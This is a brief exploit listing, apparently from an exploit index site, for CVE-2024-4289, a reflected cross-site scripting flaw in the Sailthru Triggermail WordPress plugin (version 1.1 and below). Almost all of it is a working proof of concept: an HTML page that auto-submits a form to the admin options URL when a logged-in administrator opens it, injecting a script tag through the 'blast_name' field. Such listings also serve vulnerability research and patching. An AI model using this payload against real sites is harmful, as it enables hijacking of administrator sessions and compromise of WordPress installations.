Exploit for Sailthru Triggermail <= 1.1 - Reflected XSS CVE-2024-4289

Name: Exploit for Sailthru Triggermail <= 1.1 - Reflected XSS CVE-2024-4289
Rating: 5 (86 reviews)

2024-04-30 | CVSS 8.5

## https://sploitus.com/exploit?id=WPEX-ID:072785DE-0CE5-42A4-A3FD-4EB1D1A2F1BE
Make a logged in admin open:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/options-general.php?page=sailthru&action=blast" method="post">
        <input type="hidden" name="blast_name" value='"><script>alert(23)</script>' />
        <input type="submit" value="Submit" />
    </form>
</body>
```